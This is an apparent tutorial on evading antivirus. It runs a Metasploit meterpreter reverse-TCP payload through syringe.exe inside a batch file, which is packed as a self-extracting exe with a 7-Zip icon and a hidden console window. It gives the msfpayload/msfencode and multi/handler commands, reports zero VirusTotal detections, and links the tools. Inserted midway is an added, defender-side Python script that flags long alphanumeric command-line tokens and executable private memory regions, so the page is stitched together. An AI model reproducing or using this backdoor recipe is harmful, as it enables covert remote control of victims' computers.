
Bypassing antivirus with a sharp syringe

by Hasan aka inf0g33k


independent security researcher

Email: h.inf0g33k@gmail.com FB: facebook.com/hasan.infogeek twitter: twitter.com/inf0g33k

Today I am explaining a clever and relatively little known way to bypass antivirus without using any encoder. I am using syringe to run my shellcode directly. The method this tool uses is: it opens a location in its own address space with a call to VirtualAlloc, requesting read, write and execute permissions. VirtualAlloc is a Windows-specific call that reserves a region of memory with the specified permissions. The read and write permissions are required because the alphanumeric shellcode modifies itself as it executes. Syringe then copies the user-supplied shellcode string into the memory buffer returned by VirtualAlloc. Finally, Syringe executes the shellcode via an assembly stub that takes a pointer to the shellcode as its only parameter before calling it. One of the very nice features of this tool is that the stub used to execute the shellcode is wrapped in a Structured Exception Handler (SEH) block, allowing the program to exit gracefully even if the shellcode encounters an error.
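The loader behaviour described above leaves two observable traces: a long, purely alphanumeric argument handed to a runner on the command line, and a private RWX memory region that is not backed by any image. The following script is an added example written for this page (it is not the author's code and not syringe's); it implements both checks as defender-side heuristics. The batch text and the memory-region records are constructed sample data, and the long alphanumeric blob is generated from a seeded PRNG, not encoded shellcode.

```python
"""Defender-side heuristics for the loader pattern described in the write-up.

Added example, not part of the original page. Two checks:
  1. flag long alphanumeric tokens in batch/command lines (what an
     alpha_mixed-encoded payload passed to a runner looks like);
  2. flag private, committed memory regions with execute permission
     (what a VirtualAlloc(RWX) copy-and-jump loader leaves behind).
All sample data is constructed for this example.
"""
import random
import re
import string
from dataclasses import dataclass
from typing import List, Tuple

_TOKEN = re.compile(r"[A-Za-z0-9]+")


def suspicious_alnum_tokens(text: str, min_len: int = 120) -> List[Tuple[int, int]]:
    """Return (line_number, token_length) for every long alphanumeric token.

    Requires upper-case, lower-case and digit characters plus a wide
    character set so that plain hex strings are not reported. Base64 blobs
    without '+' or '/' can still match; treat hits as triage leads.
    """
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for tok in _TOKEN.findall(line):
            if len(tok) < min_len:
                continue
            classes = (any(c.isupper() for c in tok),
                       any(c.islower() for c in tok),
                       any(c.isdigit() for c in tok))
            if all(classes) and len(set(tok)) >= 20:
                hits.append((line_no, len(tok)))
    return hits


@dataclass
class Region:
    """Minimal view of a process memory region (constructed schema)."""
    base: int
    size: int
    protect: str   # "rwx", "r-x", "rw-", ...
    kind: str      # "image", "mapped" or "private"


def executable_private_regions(regions: List[Region]) -> List[int]:
    """Return base addresses of private regions that carry the execute bit.

    Image-backed code (DLLs, the main module) is expected to be executable,
    so only private (heap-style) regions are reported. JIT engines such as
    .NET or browsers also create these, so confirm before acting.
    """
    return [r.base for r in regions
            if r.kind == "private" and "x" in r.protect]


# ---- constructed sample input -------------------------------------------
_rng = random.Random(1)
_FAKE_BLOB = "".join(_rng.choice(string.ascii_letters + string.digits)
                     for _ in range(300))   # random filler, not shellcode

SAMPLE_BAT = f"""@echo off
rem constructed sample batch file for the example
start /min notepad.exe
syringe.exe {_FAKE_BLOB}
"""

SAMPLE_REGIONS = [
    Region(0x00400000, 0x1000, "r-x", "image"),    # main module: expected
    Region(0x00500000, 0x9000, "rw-", "private"),  # ordinary heap
    Region(0x02a00000, 0x1000, "rwx", "private"),  # loader-style RWX buffer
    Region(0x7c800000, 0x1000, "r-x", "image"),    # system DLL: expected
]

if __name__ == "__main__":
    print("alnum token hits:", suspicious_alnum_tokens(SAMPLE_BAT))
    print("exec private regions:",
          [hex(b) for b in executable_private_regions(SAMPLE_REGIONS)])
```

Both functions return plain lists so they can be wired into a batch-file linter or a memory-scan post-processor; the thresholds (`min_len`, the 20-distinct-character floor) are starting points to tune against your own baseline of legitimate scripts.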

Req.: backdoor.bat (included in package, link below), i.vbs, syringe.exe, MakeExeFromBat.bat, 7za.exe, 7zsd.sfx, metasploit (in backtrack, link below). Opt.: Resource Hacker.

1. First we need to generate a payload we can copy and use in our backdoor, using this command:

msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.116.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX

2. Now copy the generated payload and paste it into backdoor.bat. Take care to replace only the payload and not to remove the "C s.bat" after it.

3. Now open a command prompt and run MakeExeFromBat.bat with the following arguments:

MakeExeFromBat.bat backdoor.bat i.vbs syringe.exe

It will create an exe file with a 7z icon, as I am using it to create an SFX archive.

4. Now run the multi handler using this command:

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.116.1 E

Wait a little and it'll start listening.

5. Now let's run our exe file.

And we got a shell!

Now let's scan our backdoor with VirusTotal.

As you can see we got 0 detections!

If you want to change the icon and description, just use Resource Hacker (link below).

Q: Why am I not using a batch-to-exe converter?

A: Everything you compile with it gets detected by some antivirus programs.

Q: Why am I using 7zip?

A: To create an SFX file from our .bat file.

Q: Why am I using this vbs file?

A: Just to hide the CMD window started by the bat file. I know there are better ways.

Links:

All files: http://www.mediafire.com/?kamwdi4ci96c2q7

Resource Hacker: http://www.angusj.com/resourcehacker/reshack_setup.exe

Metasploit: www.metasploit.com

Thanks for your time.

Inf0g33k
